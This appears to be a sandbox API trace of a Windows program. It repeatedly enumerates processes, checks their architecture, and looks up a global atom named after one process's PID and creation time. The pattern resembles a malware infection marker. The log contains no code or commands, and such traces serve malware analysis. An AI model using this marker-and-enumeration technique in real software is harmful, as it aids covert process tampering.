	[0101.479] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.479] CloseHandle (hObject=0x520) returned 1
	[0101.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x520
	[0101.479] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.479] CloseHandle (hObject=0x520) returned 1
	[0101.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x520
	[0101.479] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.479] CloseHandle (hObject=0x520) returned 1
	[0101.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x520
	[0101.479] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.479] CloseHandle (hObject=0x520) returned 1
	[0101.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x520
	[0101.480] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.481] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.481] GetProcessTimes (in: hProcess=0x520, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.481] wsprintfA (in: param_1=0x722c60, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.482] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.482] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.482] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.482] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.482] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.482] CloseHandle (hObject=0x520) returned 1
	[0101.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x520
	[0101.482] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.482] CloseHandle (hObject=0x520) returned 1
	[0101.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x520
	[0101.483] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.483] CloseHandle (hObject=0x520) returned 1
	[0101.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x524
	[0101.556] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.556] CloseHandle (hObject=0x524) returned 1
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x524
	[0101.557] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.557] CloseHandle (hObject=0x524) returned 1
	[0101.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x524
	[0101.557] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.557] CloseHandle (hObject=0x524) returned 1
	[0101.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x524
	[0101.557] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.557] CloseHandle (hObject=0x524) returned 1
	[0101.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x524
	[0101.557] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.557] CloseHandle (hObject=0x524) returned 1
	[0101.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x524
	[0101.558] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.558] CloseHandle (hObject=0x524) returned 1
	[0101.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x524
	[0101.558] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.558] CloseHandle (hObject=0x524) returned 1
	[0101.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x524
	[0101.558] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.558] CloseHandle (hObject=0x524) returned 1
	[0101.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x524
	[0101.558] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.558] CloseHandle (hObject=0x524) returned 1
	[0101.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x524
	[0101.559] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.559] CloseHandle (hObject=0x524) returned 1
	[0101.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x524
	[0101.559] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.559] CloseHandle (hObject=0x524) returned 1
	[0101.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x524
	[0101.559] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.559] CloseHandle (hObject=0x524) returned 1
	[0101.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x524
	[0101.559] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.559] CloseHandle (hObject=0x524) returned 1
	[0101.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x524
	[0101.559] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.559] CloseHandle (hObject=0x524) returned 1
	[0101.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x524
	[0101.560] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.560] CloseHandle (hObject=0x524) returned 1
	[0101.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x524
	[0101.560] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.560] CloseHandle (hObject=0x524) returned 1
	[0101.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x524
	[0101.560] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.560] CloseHandle (hObject=0x524) returned 1
	[0101.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x524
	[0101.560] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.560] CloseHandle (hObject=0x524) returned 1
	[0101.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x524
	[0101.560] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.560] CloseHandle (hObject=0x524) returned 1
	[0101.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x524
	[0101.561] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.561] CloseHandle (hObject=0x524) returned 1
	[0101.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x524
	[0101.561] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.561] CloseHandle (hObject=0x524) returned 1
	[0101.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x524
	[0101.561] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.561] CloseHandle (hObject=0x524) returned 1
	[0101.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x524
	[0101.561] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.561] CloseHandle (hObject=0x524) returned 1
	[0101.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x524
	[0101.561] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.561] CloseHandle (hObject=0x524) returned 1
	[0101.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x524
	[0101.562] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.562] CloseHandle (hObject=0x524) returned 1
	[0101.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x524
	[0101.562] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.562] CloseHandle (hObject=0x524) returned 1
	[0101.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x524
	[0101.562] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.562] CloseHandle (hObject=0x524) returned 1
	[0101.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x524
	[0101.562] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.562] CloseHandle (hObject=0x524) returned 1
	[0101.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x524
	[0101.562] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.562] CloseHandle (hObject=0x524) returned 1
	[0101.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x524
	[0101.563] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.563] CloseHandle (hObject=0x524) returned 1
	[0101.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x524
	[0101.563] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.563] CloseHandle (hObject=0x524) returned 1
	[0101.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x524
	[0101.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.564] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.564] GetProcessTimes (in: hProcess=0x524, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.603] wsprintfA (in: param_1=0x398caf0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.603] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.603] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.603] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.604] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.604] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.604] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.604] CloseHandle (hObject=0x524) returned 1
	[0101.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x524
	[0101.604] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.604] CloseHandle (hObject=0x524) returned 1
	[0101.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x524
	[0101.604] IsWow64Process (in: hProcess=0x524, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.604] CloseHandle (hObject=0x524) returned 1
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x574
	[0101.682] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.682] CloseHandle (hObject=0x574) returned 1
	[0101.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x574
	[0101.683] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.683] CloseHandle (hObject=0x574) returned 1
	[0101.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x574
	[0101.683] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.683] CloseHandle (hObject=0x574) returned 1
	[0101.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x574
	[0101.683] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.683] CloseHandle (hObject=0x574) returned 1
	[0101.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x574
	[0101.683] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.683] CloseHandle (hObject=0x574) returned 1
	[0101.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x574
	[0101.684] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.684] CloseHandle (hObject=0x574) returned 1
	[0101.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x574
	[0101.684] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.684] CloseHandle (hObject=0x574) returned 1
	[0101.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x574
	[0101.684] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.684] CloseHandle (hObject=0x574) returned 1
	[0101.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x574
	[0101.684] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.684] CloseHandle (hObject=0x574) returned 1
	[0101.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x574
	[0101.685] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.685] CloseHandle (hObject=0x574) returned 1
	[0101.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x574
	[0101.685] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.685] CloseHandle (hObject=0x574) returned 1
	[0101.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x574
	[0101.685] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.685] CloseHandle (hObject=0x574) returned 1
	[0101.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x574
	[0101.685] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.685] CloseHandle (hObject=0x574) returned 1
	[0101.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x574
	[0101.685] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.685] CloseHandle (hObject=0x574) returned 1
	[0101.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x574
	[0101.686] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.686] CloseHandle (hObject=0x574) returned 1
	[0101.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x574
	[0101.686] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.686] CloseHandle (hObject=0x574) returned 1
	[0101.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x574
	[0101.686] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.686] CloseHandle (hObject=0x574) returned 1
	[0101.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x574
	[0101.686] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.686] CloseHandle (hObject=0x574) returned 1
	[0101.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x574
	[0101.686] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.686] CloseHandle (hObject=0x574) returned 1
	[0101.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x574
	[0101.687] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.687] CloseHandle (hObject=0x574) returned 1
	[0101.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x574
	[0101.687] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.687] CloseHandle (hObject=0x574) returned 1
	[0101.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x574
	[0101.687] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.687] CloseHandle (hObject=0x574) returned 1
	[0101.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x574
	[0101.687] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.687] CloseHandle (hObject=0x574) returned 1
	[0101.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x574
	[0101.687] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.687] CloseHandle (hObject=0x574) returned 1
	[0101.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x574
	[0101.688] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.688] CloseHandle (hObject=0x574) returned 1
	[0101.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x574
	[0101.688] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.688] CloseHandle (hObject=0x574) returned 1
	[0101.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x574
	[0101.688] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.688] CloseHandle (hObject=0x574) returned 1
	[0101.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x574
	[0101.688] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.688] CloseHandle (hObject=0x574) returned 1
	[0101.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x574
	[0101.688] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.688] CloseHandle (hObject=0x574) returned 1
	[0101.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x574
	[0101.689] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.689] CloseHandle (hObject=0x574) returned 1
	[0101.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x574
	[0101.689] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.689] CloseHandle (hObject=0x574) returned 1
	[0101.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x574
	[0101.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.690] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.690] GetProcessTimes (in: hProcess=0x574, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.690] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.690] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.691] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.691] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.691] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.691] CloseHandle (hObject=0x574) returned 1
	[0101.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x574
	[0101.691] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
